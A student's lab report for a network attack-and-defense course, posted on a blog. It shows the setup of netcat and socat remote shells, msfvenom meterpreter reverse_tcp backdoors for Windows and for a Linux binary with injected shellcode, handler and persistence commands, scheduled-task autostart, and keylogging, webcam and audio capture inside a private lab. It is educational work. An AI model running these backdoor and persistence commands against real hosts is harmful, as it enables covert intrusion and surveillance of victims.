20232312 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实验内容

1.1核心技术与工具运用:​​

  • Netcat/Socat:学习了如何利用这些“网络瑞士军刀”建立反向TCP连接,从而在受控主机上获取一个远程Shell

  • 重点实践了使用msfvenom生成跨平台的有效载荷(Payload),以及使用msfconsole的处理器(Handler)模块来接收反弹连接

1.2攻击链的完整实践

  • 初始访问:通过执行恶意程序(MSF生成的后门)获得初步立足点。

  • 命令与控制:使用Meterpreter会话来维持与目标系统的稳定通信。

  • 权限提升:​尝试利用系统漏洞或配置弱点获取更高权限(如SYSTEM或root)

  • 信息收集:利用Meterpreter的模块进行键盘记录、屏幕截图、摄像头控制等,实现敏感信息窃取

2.实验过程

2.1 实践目标

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

2.2 回答问题

  • 例举你能想到的一个后门进入到你系统中的可能方式?

    • 软件供应链攻击。在软件的官方更新中植入了后门,用户基于对官方的信任通常不会对其留有心眼,更新后导致系统被植入后门
  • 例举你知道的后门如何启动起来(win及linux)的方式?

    • ① 注册表启动:在这些注册表键下添加一个指向后门程序的键值

    • ② 服务:将后门程序注册为一个系统服务,并设置为自动启动

  • Meterpreter有哪些给你映像深刻的功能?

    • 支持多种传输方式(反向TCP、反向HTTP/S、绑定TCP),可以轻松穿透网络边界(防火墙、NAT)

    • 内置多种提权模块,可以自动化地利用系统漏洞(Windows内核漏洞、服务配置错误)来获取root权限,便可以为所欲为

  • 如何发现自己有系统有没有被安装后门?

    • ① 寻找可疑的、不熟悉的进程名,或者已知合法进程的CPU/内存占用异常高

    • ② 与已知的干净系统文件哈希值(如通过官网下载的ISO)进行对比。使用工具如 Linux的AIDE或Windows系统自带的 sfc /scannow可以检查核心系统文件是否被篡改

    • ③ 使用安全工具(360、火绒)进行保护,开启Windows Defender内所有选项

2.3使用netcat获取主机操作Shell,cron启动写文件任务

2.3.1在Windows上下载ncat

  • 进入页面https://gitee.com/wildlinux/NetSec/attach_files, 下载并解压即可
    b1f034fc7b7ac604ea3dac6ba2503ffa

2.3.2用ncat连接Windows与kali

  • 在Windows上输入
    image

  • 在kali输入
    f64074b3-aa33-41dd-a753-608c61e2dea5

其中192.168.3.11为Windows中ipconfig找到的本机的局域网地址

  • 连接成功,输入ls可看到kali上的文件
    6393ab76-1c1d-42fd-88b7-a3ddb4fa996b

2.3.3设置定时任务

  • 设置将本人名字lijingyuan写入带有本人学号的20232312_1.txt文件中
    2dc083a820ea2e7052bc584f2f6b371a
  • 通过命令查看
    537ce6eadadb0e360b303cf41c61bdc3
  • 可以看到结果
    cc80603d4513f857f2c6e0922d7241db
    (这张是后面补的,把结果都拖出来了)

2.4 使用socat获取主机操作Shell, 任务计划启动

2.4.1下载 socat

  • 同样的网址https://gitee.com/wildlinux/NetSec/attach_files 下载socat

2.4.2使用socat连接Windows和kali

  • 在Windows中输入./socat.exe tcp-listen:8888 exec:cmd.exe,pty,stderr监听端口8888
    4a3cb63bad3a40fa41cde389c40d2c97

  • 在kali中输入socat - tcp:192.168.3.11:8888(192...为Windows中ipconfig的结果)
    438b04a692722b350df9a43beba249c5

  • 输入dir可以看到连接成功
    e2996668-7b92-47a9-b24a-71a348cc85d7

2.4.3定时运行可执行程序

  • 编写一个程序,内含我的名字,命名为我的学号
    03f18e57987de3538cb882bf120a433c

  • 输入schtasks /create /sc minute /mo 1 /tn “20232312ljy"/tr"E:\gongfangtest.exe定时运行
    91f1863f48a1fccdccb4dc185f025008

  • 可以看到已经成功加入
    54bc891f0576f8d29873763b3274a8bd

2.5 使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

2.5.1准备工作

  • 关闭Windows的防护系统
    a2e4bc38b7c98ab9e106a9a45d7f8c37

2.5.2生成后门文件

  • 在kali中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=2312 -f exe > 20232312backdoor.exe
    生成所需文件,并将其通过netcat发送至Windows
    724caebe09882cb6f0cf17c6a737a9ed
    image
    98cfdea21b4ef5e04631633209761122
    (截图是后面补充的,当时漏截了)*

2.5.3运行后门程序连接Windows与kali

  • 在kali中输入msfconsole,打开msf控制台,输入以下命令
use exploit/multi/handler //使用exploit攻击
set payload windows/meterpreter/reverse_tcp //对Windows系统的反向TCP攻击
set LHOST 192.168.44.129 //kali的地址
set LPORT 2312 //设置攻击端口为2304端口
exploit //开始执行攻击

3bdbd634533573ce63db20ceb02b0deb

  • 此时双击刚才传出来的exe文件即可连接
    88cef465f26061bb863142d30423fa3e

6aad995a-87db-43be-ac6f-2951e13f62f4

2.6 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

  • 获取键盘内容
    c073837d-d04c-4172-a155-3ab82c510141
  • 获取音频
    6aad995a-87db-43be-ac6f-2951e13f62f4
  • 获取截图
    c09db90fe35972a8d4f823cb303ab3ae
  • 获取相机
    b7be43af-734a-4697-ab36-d7567a8decd6
    2be066523c607f10ff21e6c5c6836fd2

2.7使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

  • 输入msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=2312 -x /home/kali/Desktop/pwn20232312_1 -f elf > pwn20232312_3进行反向tcp攻击
  • 本步与上同
    a2424069-608b-496d-b49b-99706d92a123
  • 打开另一终端运行新生成的pwn20232312_3可以看到运行成功
    b91ae355-91bb-4884-902d-be0b6b9bb437
  • 攻击成功
    d21db1cf-9d38-4bbb-81dd-4651c2af39f7

3.问题及解决方案

  • 问题1:目标机器运行木马后,Kali 显示 Sending stage但提示 Meterpreter session is not valid and will be closed

  • 问题1解决方案:前往微软官方下载页面:Microsoft Visual C++ Redistributable Latest Supported Downloads下载 vc_redist.x86.exe(32位版本)点击运行后再运行后门软件即可。

  • 问题2:Meterpreter会话不稳定,频繁断开

  • 问题2解决方案:设置会话保持参数

msf exploit(multi/handler) > set SessionCommunicationTimeout 0
msf exploit(multi/handler) > set SessionExpirationTimeout 0
msf exploit(multi/handler) > set ExitOnSession false

使用自动重连机制

meterpreter > run persistence -U -i 10 -p 2312 -r 192.168.44.129

4.学习感悟、思考等

本周的实验超越了简单的工具使用层面,构成了一次对系统安全本质的深入探查。整个过程从建立基础的网络连接开始,逐步深入到后门的植入、控制与权限提升。

Netcat和Socat作为网络调试的“瑞士军刀”,在攻击者手中转化为建立反向Shell的利器。其原理之简洁、效果之直接,凸显了网络服务中未被妥善管理的端口所蕴含的风险。而 MSF 框架的模块化设计,尤其是 Meterpreter 的强大功能,展现了现代攻击工具的自动化与智能化水平。从获取一个简单的 Shell 到进行键盘记录、屏幕捕获等高级操作,其流程之顺畅令人印象深刻。

​​在安全观念上,最大的收获在于对信任机制的理解。通过系统自带的任务计划(cron&&schtasks)实现后门自启动,是一种高度隐蔽的持久化手段。这印证了一个关键安全原则:最大的威胁往往隐藏在最受信任的机制之中。防御不能仅依赖于边界安全设备,更需深入系统内部,对进程、服务、调度任务等行为进行持续监控和异常分析。

参考资料

posted @ 2025-10-22 08:53  20232312李劲源  阅读(11)  评论(0)    收藏  举报